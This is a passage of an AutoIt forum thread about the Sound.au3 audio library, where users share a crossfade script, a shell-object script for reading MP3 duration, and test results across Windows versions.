names in netbeans how to create a JNDI names in netbeans hibernate on netbeans - Hibernate hibernate on netbeans is it possible for me to run the hibernate program on Netbeans IDE connect netbeans with oracle connect netbeans with oracle how to connect netbeans with oracle Hi Friend, Please visit the following link: Here you will find the steps to connect netbeans RMI Program in netbeans RMI Program in netbeans pls give me an idea for how to run RMI program in netbeans with detailed example "The folder name is not valid" netbeans "The folder name is not valid" netbeans "The folder name is not valid" while crating a jsp,html or any page in netbeans NetBeans - IDE Questions NetBeans Can we use netbeans to create servlet, jsp pages?If yes means can you explain how it can be done? how to use netbeans for creating jsp...:// Hope that it will be helpful struts-netbeans - Framework struts-netbeans hai friends please provide some help "how to execute struts programs in netbeans IDE?" is requires any software or any supporting files to execute this. thanks friends in advance jdbc and swing problem in netbeans jdbc and swing problem in netbeans i reteived the table from database in a jdbc program. next i want to do is place the table as it is in a jpanel.. i am using netbeans IDE can u tel me how to do that one?? urgent buttons in netbeans,java buttons in netbeans,java respected sir, i would like to known how to make coding on a button while working on netbeans, so that a new window will open after clicking on that button? thank you import java.awt. java swing in netbeans java swing in netbeans how can create sub menu in java swing using netbeans? Hi Friend, Try the following code: import javax.swing.*; public class CreateSubmenu { public static void main(final String args IDE NetBeans IDE The NetBeans IDE, product of Sun Microsystems, is a free, open-source.... NetBeans IDE supports developers providing all the tools needed to create all Netbeans Array help Netbeans Array help Ok here is my code- * * To change this template, choose Tools | Templates * and open the template in the editor. */ import java.util.Random; /** * */ public class ContinueRollDie { * @param args Prepared Statement Set Big Decimal Prepared Statement Set Big Decimal  ... the big decimal and how can be set it in the database table by using the PreparedStatement interface of java.sql package. But here arises a question, what is big Linking JMenu Item with a JPane in Netbeans Linking JMenu Item with a JPane in Netbeans How do you link a Jpane window to a JMenu Item in Java Netbeans Deploy .war from From NetBeans Deploy .war from From NetBeans How to deploy .war file into external running application server directly from Netbeans just as from eclipse
http://www.roseindia.net/tutorialhelp/comment/98180
CC-MAIN-2014-52
refinedweb
1,575
60.45
David, I don't know struts so I can't evaluate Eddie's argument. It's frustrating that the limitations of JavaBeans are having such far-reaching effects. It seems everything that has anything to do with data these days has to be a JavaBean. I wonder if JSR 175 is going to change that? I do think I understand the JavaBeans argument, and I think you understand mine. I admit I don't see a solution that would satisfy both sides. So let's leave it at that for now. :) Moving? On a related note, why doesn't XmlObject extends Serializable? I feel like I'm taking a chance passing an XMLBean over RMI. Thanks, Michael On Mon, 19 Jan 2004, David Bau wrote: > Michael, > > Following up further on getIntValue/etc. > > I went back to Eddie O'Neil (a bea colleague), who was one of the people who > ran into the problem with intValue() which lead us to the idea of changing > to getIntValue(). Eddie is using XMLBeans within a struts-based tool. > > Eddie's explanation of the issue is pasted below. (Eddie, I hope it's OK > that I am forwarding your note to the list.) > > I want a design that passes all the philosophical and purity tests, and I > agree that "nonorthogonal properties" are not a great thing. But you'd > probably agree that, for XMLBeans to be useful, we need make sure the design > solves the pragmatic issues above all. (I think we've done a pretty good > job at balancing pragmatism and purity in XMLBeans so far.) Along those > lines, I still don't see any better alternative to the getIntValue()-style > solution to the struts/JSP 2.0 binding problem that Eddie describes below. > Do you see how the design falls out of the struts binding issue? > > David > > [Eddie's note below] > > > ----- Original Message ----- > > From: "Eddie O'Neil" > > To: "David Bau" <david.bau@bea.com> > > Sent: Monday, January 19, 2004 12:37 PM > > Subject: Re: Remember the XmlInt.getIntValue bug? > > > > > > > David-- > > > > > > Hey, good to hear from you. > > > > > > You're right about what the problem was -- we (and Struts) bind to > > > JavaBean style properties on objects. This is an issue in Struts in > > > general and will be an issue with binding to XMLBeans using the JSP 2.0 > > > expression language as well -- both use the JavaBean naming conventions > > > for accessing properties on objects. So, something named "intValue()" > > > wouldn't be accessible in a regular Struts application if it was exposed > > > on an object that was wrapped in an action form. In JSP 2.0, for > > > example, if you have an XMLBean and want to access the value of such a > > > simple type with an attribute, you would want to use this expression: > > > > > > {request.poXmlBean.order.total.intValue} > > > > > > on a document that looks like: > > > > > > <order> > > > <total currency="USD">59.95</total> > > > </order> > > > > > > in order to get to 59.95. > > > > > > Feel free to correct my example, but that's the general idea. > > > > > > I can sort of see Michael's point, but it's not a simple matter of > > > purity. The argument that this code modifies two distinct fields in an > > > object doesn't seem to hold to me: > > > > > > xmlInt.setIntValue(1); > > > xmlInt.setLongValue(2); > > > > > > I would expect that this code would do whatever the bean's documentation > > > and (hidden!) underlying implementation says that it does -- it doesn't > > > imply that the implementation of the bean maintains two distinct private > > > fields -- intValue and longValue. Consider: > > > > > > public class Name > > > { > > > private String firstName; > > > private String lastName; > > > > > > String getFirstName() ... > > > String getLastName() ... > > > String getName() ... > > > } > > > > > > Michael's stance would mean that "getName()" shouldn't be a JavaBean > > > property because it means that there would need to be a "name" as a > > > private field where in this case name is implemented as: > > > > > > public String getName() > > > { > > > return getLastName() + ", " + getFirstName(); > > > } > > > > > > There is value in being able to do getName() just like there's value in > > > being able to expose a single bit of data stored in an object in many > > > different ways. > > > > > > Tools and binding languages have gravitated toward the JavaBean spec, > > > right or wrong. As a result, it would be a shame to have a great way to > > > compile an XSD and consume an XML document but no way of binding to said > > > document without adding another layer atop it that then exposes the XML > > > to a binding language. > > > > > > Does that make sense? > > > > > > Eddie > > > - --------------------------------------------------------------------- >:
http://mail-archives.apache.org/mod_mbox/xml-xmlbeans-dev/200401.mbox/%3C20040119231911.H45581@hydra.nfcnet%3E
CC-MAIN-2016-26
refinedweb
729
63.19
computer science > Preview The flashcards below were created by user zeina1074 on FreezingBlue Flashcards . Get the free mobile app Take the Quiz Learn more What is software? A term that refers to computer programs What is a program? A set of instructions given to the computer to carry out a task What are the two types of software? What do they refer to? Systems software- programs written for the computer (operating systems) Applications software- programs written for users (word processing) What are the three types of applications software? Tailor-made software Off-the-shelf software Integrated software package What is the advantage of tailor–made software? Satisfies the company's requirements Easily modified and updated Operates easily Easier to train employees What is the disadvantage of tailor-made software? Expensive Takes time May not immediately function properly Errors may occur Maintenance very dependent of the software developers What are the advantages of buying ready software over having it especiallywritten? Available Excellent documentation. Well tested Cheaper than having one written. Popular and has a wide user base. Available support from experienced trainers and users What is the disadvantage of buying ready software over having it especially written? Harder to modify May not meet specific requirements Difficult to learn What is an integrated package? It is a package consisting of a collection of programs that can share the same data. Name programs that are likely to be included in an integrated package Word processor program, Database program, Spreadsheet programGraphics program, Communications program What are the advantages of integrated software? Requires less storage space than having several specialized packages Cheaper than buying several packages Programs can easily share data User friendly as the commands are common in all the programs What are the disadvantages of integrated software? Programs are less powerful than the specialized ones If any program gets corrupted then all might be corrupted What is a word processing program? A program that allows the user to create a text document representing a sequence of text characters and formatting codes, edit it, save it, and print it Main features of a word processing program(10): cut,copy,paste spell check format text and pictures different fonts, text sizes.. find and replace import graphics headers and footers can be used as web design programs for basic web page creation table of contents, numbered captions... exporting as a text or webpage file or as a mail or email merge What is meant by the computer term mail merging? Mail merge is the ability to personalize letters with names and addresses from a database. What is meant by the computer term macro? A macro is a single instruction that replaces a set of instructions and can bedone by pressing a key or clicking on an icon. Macros automates actionsrepetitive sequences of keystrokes and mouse movements What are the benefits of using a template? Using a template avoids repeating work every time a document is created. What is DTP? A program that produces documents of a quality good enough for publications What are the main features of a DTP? facilitates the control of the page layout, i.e. to arrange text and graphics together in an attractive way and to divide pages into columns allows the user to layout pictures and text in frames users can import images from libraries of clip-art and other programs WYSIWYG allows exporting Which feature makes DTP a frame based? It allows the user to lay out pictures and texts in frames as this is the major advantage of desktop publishing. Card Set Information Author: zeina1074 ID: 237654 Filename: computer science Updated: 2013-09-29 19:09:21 periodic t1 grade Folders: Description: ... Show Answers: What would you like to do? Get the free app for iOS Get the free app for Android Learn more > Flashcards > Print Preview
https://www.freezingblue.com/flashcards/print_preview.cgi?cardsetID=237654
CC-MAIN-2017-22
refinedweb
638
52.9
React Native for Web is an open source project that enables you to use React Native core components in React web applications. React Native for Web uses React DOM to render JavaScript code that is compatible with React Native in a web browser, making code sharing possible. In this tutorial, we’ll set up a React web app using Parcel, build components using React Native core components, and finally, share these components between our mobile and web applications with React Native for Web. Let’s get started! Setting up React Native First, we’ll create a new React Native app. For this demonstration, I’m using npx, but you can also use the react-native-cli package if it is installed globally on your development environment. Open up a new terminal window and execute the following command: npx react-native init MyApp MyApp is a placeholder for the name of your React Native project. If you are using iOS Simulator, run yarn run ios. If you’re using an emulator for Android, run yarn run android. Once the build process is complete, you’ll see the default React Native app with the boilerplate code, which you can modify inside of App.js. As an example, I’ll render a simple text message inside of App.js: import React from 'react'; import { View, StyleSheet, Text } from 'react-native'; const styles = StyleSheet.create({ screenContainer: { flex: 1 }, text: { fontSize: 20, color: 'cornflowerblue', marginTop: 50, alignSelf: 'center' } }); const App = () => { return ( <View styles={styles.screenContainer}> <Text style={styles.text}>I'm a React Native component</Text> </View> ); }; export default App; The output of the code above will look like the image below: Setting up Parcel We’ll use Parcel, a bundler that requires zero configuration, to easily set up a new web app in React. Setting up a React app using Parcel follows a similar paradigm to generating an app using Create React App. Create a new directory inside of your React Native project called web/. Inside, we’ll create the following files and add the respective boilerplate code. Create a file called index.html and add the following code: <html> <body> <div id="root"></div> <script src="./index.js"></script> </body> </html> Create an App.js file and add the following code to render a text inside of the h2 tag: import React from 'react'; const WebAppTitle = () => { return ( <div> <h2 style={{ color: '#9400d3', fontSize: '32' }}> I'm a React app component. </h2> </div> ); }; const App = () => { return ( <> <WebAppTitle /> </> ); }; export default App; Note that the WebAppTitle is a custom web component. Now, we’ll create an index.js file and add the following code: import React from 'react'; import { render } from 'react-dom'; import App from './App'; render(<App />, document.getElementById('root')); Next, we’ll initialize a React app with yarn init, which will open an interactive session for you to create a package.json file and add the required defaults. However, you can skip this session by running the shorthand yarn init --yes. After running yarn init --yes, the package.json file should look like the code below: { "name": "web", "version": "1.0.0", "main": "index.js", "license": "MIT" } Next, install the following dependencies inside of the web directory: yarn add react react-dom react-native-web yarn add -D parcel-bundler Parcel can take any file as an entry point, but an HTML or a JavaScript file is recommended for a web app. Now, we’ll add the following scripts to the package.json file: { "scripts": { "start": "parcel serve ./index.html", "build": "parcel build ./index.html" } } Bundling our web app with Parcel requires a custom setup. To configure Parcel to add an alias for the react-native-web package, add the following code to package.json: { "alias": { "react-native": "react-native-web" } } The complete package.json file should look like the following code block: { "name": "web", "version": "1.0.0", "main": "index.js", "license": "MIT", "dependencies": { "react": "17.0.2", "react-dom": "17.0.2", "react-native-web": "0.17.1" }, "devDependencies": { "parcel-bundler": "1.12.5" }, "scripts": { "start": "parcel serve ./index.html", "build": "parcel build ./index.html" }, "alias": { "react-native": "react-native-web" } } To start the development server for the web app, run yarn start from the terminal window. Parcel will build the web app and serve it on: Creating a shared component Now that we’ve set up a React Native app and a React web app, let’s create a shared component that we can use in both. Inside the root directory of your project, create a new subdirectory called shared. The subdirectory’s name indicates that anything inside of it is shared between the web and mobile apps. Inside of shared, create another subdirectory called components. Let’s create a file called Header.js, which will contain styles to display a header with a title. Add the following code to Header.js: import React from 'react'; import { View, Text, StyleSheet } from 'react-native'; const styles = StyleSheet.create({ header: { paddingTop: 50, backgroundColor: 'blue' }, headerText: { fontSize: 22, color: 'white', fontWeight: 'bold', paddingHorizontal: 10 } }); const Header = () => { return ( <View style={styles.header}> <Text style={styles.headerText}>I'm a shared component.</Text> </View> ); }; export default Header; Next, add the component to the App.js file in the root directory of your project: // add this after other import statements import Header from './shared/components/Header'; // Modify the JSX in App component const App = () => { return ( <View styles={styles.screenContainer}> <Header /> <Text style={styles.text}>I'm a React Native component</Text> </View> ); }; You’ll have to add a symbolic link to the shared directory for the web app, which is used to reference the contents of a directory at a specific location. Make sure you are in the web directory and run the following command in the terminal window: ln -s /Users/<your-os-username>/<path-to-the-shared-directory>/shared The command above will create a reference to the shared directory inside of the web directory. Now, you can import the Header component inside the web/App.js file the same way you imported the React Native app: // web/App.js import React from 'react'; import Header from './shared/components/Header'; const WebAppTitle = () => { return ( <div> <h2 style={{ color: '#9400d3', fontSize: '32' }}> I'm a React app component. </h2> </div> ); }; const App = () => { return ( <> <Header /> <WebAppTitle /> </> ); }; export default App; Run yarn start to restart the development for the web app. The output of this command will look like the image below: If you want to see how React Native for Web builds the DOM elements in the web browser, open up Developer Tools and navigate to the Elements tab. You can also right-click on the web page and select Inspect Element: On closer look, you’ll see that React Native for Web converts React Native styles and components to DOM elements. When styling components, React Native uses JavaScript objects. React Native for Web implements the React Native style API..
https://blog.logrocket.com/sharing-code-react-native-web/
CC-MAIN-2022-05
refinedweb
1,153
57.37
As part of the WinFX review team, I regularly review APIs for usability issues. One thing that we as a team have been highlighting as a potential issue is the use of virtual properties. Consider the following code snippet: public class Class1 { private string theString; public virtual string MyString { get{return theString;} set{theString = value;} } } public class Class2 : Class1 { public override string MyString { get{return “Ha ha!”;} set{base.MyString = value;} } } Code that accesses the MyString property of an instance of Class1 might either return the actual string or “Ha ha!” depending on the actual runtime type. The design guidelines suggest that properties should not be used if they perform some expensive operation (see Brad’s post on a similar issue). Calling a virtual property or method is more expensive than calling non-virtual methods or properties so that is one reason for not creating virtual properties. Another reason is that we believe the code to access a property doesn’t really suggest that the value of MyString depends on the runtime type of the object. Consider the following: publicvoid DoSomething(Class1 c1){Console.WriteLine(c1.MyString);} In this case, a developer might be surprised if calling DoSomething resulted in “Ha ha!“ being output to the console. We believe that to provide a consistent user experience, properties should mimic simple field access as much as possible. Thus virtual properties run the risk of breaking this consistency since in some cases, some properties work just like accessing a field while in other cases they work more like a virtual method call. We’re not suggesting that there is never a good reason for declaring virtual properties. We’re just discouraging the use of virtual properties and encouraging the use of virtual methods instead. However, I’d be interested in your feedback on this issue. Are we being too cautious? Ouch. That would certainly drive me nuts. You say "We believe that to provide a consistent user experience, properties should mimic simple field access as much as possible. " Why? They’re not fields, they’re properties. The whole purpose of a property is to, in fact, encapsulate that access away and to allow the actual object to decide how to respond. You’re taking away the latter when it is one of the main purposes of a property. Your example is pretty ridiculous too. When you access a property you should never make an assumption about what it is doing. If I access MyString on a class I know that it can do basically anything it wants and I should treat it that way. IMO, it’s decisions like this that always end up giving me classes that are unusable, unexstencible and force me to rewrite them all the time. Why would you pruposely restrict developers from being able to extend and utilize this code? All you end up doing is hurting those who want that power. There is a place for virtual properties in API design, but in majority of cases that we ran into during WinFx reviews, it was actually a design mistake. For example, we have seen lots of APIs where a property was virtual but it sill was just accessing the filed and there was no concrete scenarios for this property to do anything else. Sure, you can always come up with a corner case scenario, but at what cost: 1. Virtual members are not being inlined. That means virtual property access is way more expensive than a filed access. This is not really acceptable for many system APIs. 2. Virtual property (like any other virtual member) has a higher cost of design, has a negative impact on ability to version the API, and finally there are potential security implications. "We believe that to provide a consistent user experience, properties should mimic simple field access as much as possible." What about lazy load scenarios? Those aren’t simple member access scenarios. What about abstract properties? If I want to create an abstract class that requires the deriving class to implement a property, why am I being punished for it? I also agree wholeheartedly with Cyrus’s comment. — What you’re doing here is ‘limiting’ the freedom of design for developers, based on purely physical reasons. What you should be doing is go and open a can of whoop ass the ineffeciency of virtual members, namely properties. I also have to vote in favor of Cyrus’s argument. A property is syntatic sugar around a method pair (possibly a single method), and the intent is to shield the details of providing a value from all callers – the implementor is free to change the logic behind it whenever it is necessary. Well, why wouldn’t a derived class find it necessary to change the behavior? Perhaps it wants to add a smart caching scheme on top of the base class. Perhaps it wants to do a remote lookup on top of a static local loopup. I also find the performance argument non-persuasive. Sure, if you sit there in a tight loop calling it 10000/second it begins to add up, but I think code that does that is more of a corner case then your example. Most code will call it once in a while where the extra performance hit of making a virtual method call is unnoticable. Optimization is good, but it should not get in the way of functionality, especially since this is totally under the control of the base class designer, who can choose to make the property virtual or not. These are great comments, thanks for sharing them. Clearly some of you feel pretty strongly about this 🙂 We’ll absolutely take your feedback into consideration during our reviews. Just to be a little clearer than I was in my original post though, our intention is not to completely prevent API designers from using virtual properties. We just want to make sure that they have very good reasons for using them. As I said, and as you have all reiterated, there are some very good reasons for using virtual properties. We do not intend to stop API designers from using virtual properties in those cases. One follow up question I have is – "How do you determine whether or not to make a property virtual?" Steven- Perhaps I’m misunderstanding the intent of your question, but why is determining whether a property should be extensible any different than for a method, class, or anything else? I’d guess that you’d want to have some meaningful extensibility scenario. There’d have to be no issues for correctness, compatibility, or security. You’d need some amount of resources for programming / test / documentation. But don’t you have all of that anyways for virtual methods? I guess I don’t see why properties are being treated differently than methods. If you have a situtation where get/set makes sense, use a property. Otherwise, use a method. Whether it should be virtual or not doesn’t seem to depend on the particular syntax you use to express it. I cannot understand the logic against virtual properties. They are functions like any other, and need to be overrideable, like any other function, on occassion. Virtual does not cause any performance decrease of the magnitude that would cause a problem for a property in a debugger. The "suprise" in the example code would be just as suprising whether the code used a method or a property. Everyone knows a property is a type of function — so what is the big deal? We need the flexibility, and I don’t see how you are going to place restrictions, beyond "long execution time", which is a separate issue. You know what this would engcourage? GetXX() and SetXX() functions. And people will think this is somehow "better" because they are conforming to a guideline. Don’t put out a superfluous guideline! People should have very good reasons for making anything virtual, function or property. Neither is more complex than the other. Steven, Here’s a good considiration: I am given a base class with a property. I can’t trust that property to not raise any events, call any methods, etc. just after I set its value from my own class (how could I otherwise set the value?). This is why I would like to override it and do some of my own logic prior to the logic of the base class, or even alter the behaviour all together. Thanks again everybody. It seems obvious now, but thanks for making it clear to me. There is no reason for treating virtual properties any different to virtual methods. If there is a good reason for defining a virtual method, define it. If there isn’t, don’t.
https://blogs.msdn.microsoft.com/stevencl/2004/07/30/virtual-properties-anyone/
CC-MAIN-2017-22
refinedweb
1,461
63.8
TensorFlow computation graphs are powerful but complicated. The graph visualization can help you understand and debug them. Here's an example of the visualization at work. Visualization of a TensorFlow graph. To see your own graph, run TensorBoard pointing it to the log directory of the job, click on the graph tab on the top pane and select the appropriate run using the menu at the upper left corner. For in depth information on how to run TensorBoard and make sure you are logging all the necessary information, see TensorBoard: Visualizing Learning.: import tensorflow as tf with tf.name_scope('hidden') as scope: a = tf.constant(5, name='alpha') W = tf.Variable(tf.random_uniform([1, 2], -1.0, 1.0), name='weights') b = tf.Variable(tf.zeros([1]), name='biases') This results in the following three op names: hidden/alpha hidden/weights hidden/biases By default, the visualization will collapse all three into a node labeled hidden. The extra detail isn't lost. You can double-click, or click on the orange + sign in the top right to expand the node, and then you'll see three subnodes for alpha, weights and biases. Here's a real-life example of a more complicated node in its initial and expanded states. Grouping nodes by name scopes is critical to making a legible graph. If you're building a model, name scopes give you control over the resulting visualization. The better your name scopes, the better your visualization. The figure above illustrates a second aspect of the visualization. TensorFlow graphs have two kinds of connections: data dependencies and control dependencies. Data dependencies show the flow of tensors between two ops and are shown as solid arrows, while control dependencies use dotted lines. In the expanded view (right side of the figure above) all the connections are data dependencies with the exception of the dotted line connecting CheckNumerics and control_dependency. There's a second trick to simplifying the layout. Most TensorFlow graphs have a few nodes with many connections to other nodes. For example, many nodes might have a control dependency on an initialization step. Drawing all edges between the init node and its dependencies would create a very cluttered view. To reduce clutter, the visualization separates out all high-degree nodes to an auxiliary area on the right and doesn't draw lines to represent their edges. Instead of lines, we draw small node icons to indicate the connections. Separating out the auxiliary nodes typically doesn't remove critical information since these nodes are usually related to bookkeeping functions. See Interaction for how to move nodes between the main graph and the auxiliary area. One last structural simplification is series collapsing. Sequential motifs--that is, nodes whose names differ by a number at the end and have isomorphic structures--are collapsed into a single stack of nodes, as shown below. For networks with long sequences, this greatly simplifies the view. As with hierarchical nodes, double-clicking expands the series. See Interaction for how to disable/enable series collapsing for a specific set of nodes. Finally, as one last aid to legibility, the visualization uses special icons for constants and summary nodes. To summarize, here's a table of node symbols: Interaction {#interaction} Navigate the graph by panning and zooming. Click and drag to pan, and use a scroll gesture to zoom. Double-click on a node, or click on its + button, to expand a name scope that represents a group of operations. To easily keep track of the current viewpoint when zooming and panning, there is a minimap in the bottom right corner. To close an open node, double-click it again or click its - button. You can also click once to select a node. It will turn a darker color, and details about it and the nodes it connects to will appear in the info card at upper right corner of the visualization. TensorBoard provides several ways to change the visual layout of the graph. This doesn't change the graph's computational semantics, but it can bring some clarity to the network's structure. By right clicking on a node or pressing buttons on the bottom of that node's info card, you can make the following changes to its layout: - Nodes can be moved between the main graph and the auxiliary area. - A series of nodes can be ungrouped so that the nodes in the series do not appear grouped together. Ungrouped series can likewise be regrouped. Selection can also be helpful in understanding high-degree nodes. Select any high-degree node, and the corresponding node icons for its other connections will be selected as well. This makes it easy, for example, to see which nodes are being saved--and which aren't. Clicking on a node name in the info card will select it. If necessary, the viewpoint will automatically pan so that the node is visible. Finally, you can choose two color schemes for your graph, using the color menu above the legend. The default Structure View shows structure: when two high-level nodes have the same structure, they appear in the same color of the rainbow. Uniquely structured nodes are gray. There's a second view, which shows what device the different operations run on. Name scopes are colored proportionally to the fraction of devices for the operations inside them. The images below give an illustration for a piece of a real-life graph.. The images below show the CIFAR-10 model with tensor shape information: Runtime statistics Often it is useful to collect runtime metadata for a run, such as total memory usage, total compute time, and tensor shapes for nodes. The code example below is a snippet from the train and test section of a modification of the Estimators MNIST tutorial, in which we have recorded summaries and runtime statistics. See the Summaries Tutorial for details on how to record summaries. Full source is here. # if i % 100 == 99: # Record execution stats run_options = tf.RunOptions(trace_level=tf.RunOptions.FULL_TRACE) run_metadata = tf.RunMetadata() summary, _ = sess.run([merged, train_step], feed_dict=feed_dict(True), options=run_options, run_metadata=run_metadata) train_writer.add_run_metadata(run_metadata, 'step%d' % i) train_writer.add_summary(summary, i) print('Adding run metadata for', i) else: # Record a summary summary, _ = sess.run([merged, train_step], feed_dict=feed_dict(True)) train_writer.add_summary(summary, i) This code will emit runtime statistics for every 100th step starting at step99..
https://tensorflow.google.cn/guide/graph_viz
CC-MAIN-2019-39
refinedweb
1,066
57.27
3.1.1 Abstract Data Model This section describes a conceptual model of possible data organization that an implementation maintains to participate in this protocol. The organization is provided to explain how the protocol behaves. This document does not mandate that implementations adhere to this model as long as their external behavior is consistent with that described in this document. Because the DFS clients effectively block an application from accessing a specific file share until the DFS: Referral Protocol can map the DFS root name to an actual file server path, it is advantageous to cache DFS referral responses. Because of this, clients SHOULD maintain local caches of information received through referral requests to avoid future referral requests and to improve the performance of DFS resource access. BootstrapDC: Applicable only for a computer joined to a domain. This contains the name of a DC from which the DFS client will obtain a list of domain referral entries, in addition to a list of DC host names for a domain. DomainCache: Applicable only for a computer joined to a domain. This cache contains a list of trusted domains in both NetBIOS and fully qualified domain name forms, in addition to a list of DC host names for each domain. Conceptually, this is an array of tuples of the form <DomainName, DCHint, DCList>. Cache lookup involves finding a DomainCache entry with a matching DomainName. This can be used to check for a valid domain name or to find a DC host name for a given domain name. DCHint identifies a DC host name from DCList that should be the DC that was last successfully used by the DFS client. ReferralCache: This cache contains root, link, and sysvol referral responses. A hit on a ReferralCache entry indicates that the path in a name resolution operation is a DFS Root, DFS link, or a SYSVOL/NETLOGON share. A ReferralCache entry conceptually contains entries indexed by a DFS path prefix, DFSPathPrefix. An entry is a tuple of the form <DFSPathPrefix, RootOrLink, Interlink, TTL, TargetFailback, TargetHint, TargetList>. DFSPathPrefix is the DFS path that corresponds to a DFS root or a DFS link, and is the same as the string pointed to by the DFSPathOffset of a DFS_REFERRAL_V2, DFS_REFERRAL_V3 or DFS_REFERRAL_V4 referral entry. RootOrLink identifies whether the entry contains DFS root targets or DFS link targets. It reflects the value from the ServerType field of a referral entry (as specified in sections 2.2.5.1, 2.2.5.2, 2.2.5.3, and 2.2.5.4). Interlink identifies whether the entry contains a target in another DFS namespace, as determined by the test in section 3.1.5.4.5. TargetFailback is used only for DFS_REFERRAL_V4 and contains the value from the TargetFailback bit of the referral header (as specified in section 2.2.4). TTL contains a value derived from the TimeToLive field of a referral entry (as specified in sections 2.2.5.1, 2.2.5.2, 2.2.5.3, and 2.2.5.4). This is the time stamp at which a ReferralCache entry is considered to be expired. An implementation is free to come up with soft and hard time-outs based on the TimeToLive field of the referral entry, for example. The soft time-out can be used to initiate a ReferralCache entry refresh operation while permitting the use of the ReferralCache entry; the hard time-out limit can be used to fail any operation using the ReferralCache entry should all attempts to refresh it fail.<4> TargetHint identifies a target in TargetList that was last successfully used by the DFS client. TargetList consists of tuples of the form <TargetPath, TargetSetBoundary>, where TargetPath is the string pointed to by the NetworkAddressOffset field (as specified in sections 2.2.5.2, 2.2.5.3, and 2.2.5.4). TargetSetBoundary is only present in V4 referrals and reflects the value from the TargetSetBoundary of the referral entry (as specified in section 2.2.5.4).
https://msdn.microsoft.com/en-us/library/cc227024(v=prot.20)
CC-MAIN-2015-22
refinedweb
668
51.89
I have updated the first page with improvements. You can now set a sound to loop automatically by setting the 2nd parameter in _SoundPlay to 1 This is cool. Awesome Thanks Dwalf Edited by dwalf, 11 August 2006 - 10:13 AM. Posted 11 August 2006 - 02:18 AM I have updated the first page with improvements. You can now set a sound to loop automatically by setting the 2nd parameter in _SoundPlay to 1 Edited by dwalf, 11 August 2006 - 10:13 AM. Posted 23 May 2007 - 05:05 AM Posted 23 April 2008 - 12:36 AM #include "audio.au3" ;Kudos to RazeRM on his audio.au3 but i had to chop some of his soundseek in order for my trick to work Func _SoundSeek2($sSnd_id, $iMs) ;Declare variables ;Local $iMs = 0 Local $iRet ;prepare mci to recieve time in milliseconds mciSendString("set " & FileGetShortName($sSnd_id) & " time format miliseconds") ;modify the $iHour, $iMin and $iSec parameters to be in milliseconds ;and add to $iMs ;$iMs += $iSec * 1000 ;$iMs += $iMin * 60 * 1000 ;$iMs += $iHour * 60 * 60 * 1000 ; seek sound to time ($iMs) $iRet = mciSendString("seek " & FileGetShortName($sSnd_id) & " to " & $iMs) ;return If $iRet = 0 Then Return 1 Else Return SetError(1, 0, 0) EndIf EndFunc ;==>_SoundSeek ;$sID and $sID2 being the same sounds just 2 opened instances ;$lowpoint is the param of how low you want your sound to fade ;$time self explanatory in [ms] respectively ;CrossFade1 should be used when you want to loop the same tune with crossfading Func CrossFade1($sID,$sID2,$time,$lowpoint = 20) for $i = 100 to $lowpoint step -1 sleep($time/(100-$lowpoint)/2) _SoundSetMasterVolume($i) Next _SoundPlay($sID2) Sleep(500) _SoundStop($sID) _SoundSeek2($sID,_SoundPos($sID2,2)) _soundPlay($sID) _soundStop($sID2) for $i = $lowpoint to 100 step 1 sleep($time/(100-$lowpoint)/2) _SoundSetMasterVolume($i) Next EndFunc ;a bit of chopping ;/me gets binary axe :P Func CrossFade2($sID,$sID2,$time,$lowpoint = 20) for $i = 100 to $lowpoint step -1 sleep($time/(100-$lowpoint)/2) _SoundSetMasterVolume($i) Next _SoundPlay($sID2) Sleep(500) _SoundStop($sID) for $i = $lowpoint to 100 step 1 sleep($time/(100-$lowpoint)/2) _SoundSetMasterVolume($i) Next EndFunc $sound = _SoundOpen("song.mp3", "music") $sound2 = _SoundOpen("song2.mp3", "same_music") _SoundPlay($sound) sleep(3000) MsgBox(4096,"Test","CrossFade sounds good?") CrossFade1($sound,$sound2,5000) MsgBox(4096,"test","what do you think? want to make it stop?") _soundstop($sound) MsgBox(4096,"C2C","I hope you make use of mine code if you can call it that :) Peace") Posted 23 April 2008 - 07:48 PM Posted 29 September 2008 - 09:16 PM #NoTrayIcon #include <Array.au3> #include <File.au3> $hDebugFile = FileOpen(@DesktopDir & "\SoundTest.txt", 2) $sFile = FileOpenDialog("Open MP3 File", @MyDocumentsDir, "MP3 Files (*.mp3)") If @error Then FileWrite($hDebugFIle, "ERR: No File Opened" & @CRLF) Exit EndIf Local $szDrive, $szDir, $szFName, $szExt ;$szExt is ".mp3" anyway _PathSplit($sFile, $szDrive, $szDir, $szFName, $szExt) $Dir_Name = $szDrive & $szDir $File_Name = $szFName & $szExt $DOS_Dir = FileGetShortName($Dir_Name, 1) $ShellApp = ObjCreate("shell.application") If IsObj($ShellApp) Then $Dir = $ShellApp.NameSpace ($DOS_Dir) If IsObj($Dir) Then $File = $Dir.Parsename ($File_Name) If IsObj($File) Then $sRaw = $Dir.GetDetailsOf ($File, -1) FileWrite($hDebugFIle, "RAW--------------------------" & @CRLF & $sRaw & @CRLF & "END--------------------------" & @CRLF) $aInfo = StringRegExp($sRaw, "Duration: ([0-9]{2}:[0-9]{2}:[0-9]{2})", 3) If Not IsArray($aInfo) Then FileWrite($hDebugFIle, "ERR: $aInfo Not Array") Exit EndIf FileWrite($hDebugFIle, "$aInfo = [" & _ArrayToString($aInfo, ",") & "]" & @CRLF) $Track_Length = $aInfo[0] FileWrite($hDebugFIle, "$Track_Length = '" & $Track_Length & "'" & @CRLF) EndIf EndIf EndIf FileClose($hDebugFile) MsgBox(262144, "Done", "Thanks for testing.") Posted 29 September 2008 - 09:47 PM Posted 29 September 2008 - 10:35 PM Edited by RazerM, 29 September 2008 - 10:38 PM. Posted 30 September 2008 - 12:50 AM Windows 2000 w/ SP4:Windows 2000 w/ SP4: Tests from other Windows versions still needed, thanks. Posted 30 September 2008 - 04:37 PM Windows 2000 w/ SP4: SoundTest.txt is empty! Edited by RazerM, 30 September 2008 - 04:38 PM. Posted 30 September 2008 - 06:54 PM That produced no output either!That produced no output either! Try running in scite, and replace all "FileWrite($hDebugFile, " with "ConsoleWrite(" Posted 30 September 2008 - 07:20 PM Edited by RazerM, 30 September 2008 - 07:22 PM. Posted 30 September 2008 - 09:41 PM Edited by RazerM, 01 October 2008 - 03:33 PM. Posted 30 September 2008 - 09:51 PM Sound.au3 (sort of) beta. I'm looking for people to test Variable Bit Rate (VBR) songs, which are now supported properly unless the windows version doesn't support the shell.application object. If the object fails/isn't supported then the functions operate normally, albeit with possibly incorrect VBR length of sound file. (As old versions of Sound.au3 do) I've added Melba23 into authors, because the modifications were ultimately his, just modified to work within the functions rather than correcting my broken ones. I no longer need to know if the object works on different windows versions, just the new code needs tested. Edited by monoceres, 30 September 2008 - 09:53 PM. Broken link? PM me and I'll send you the file! Posted 30 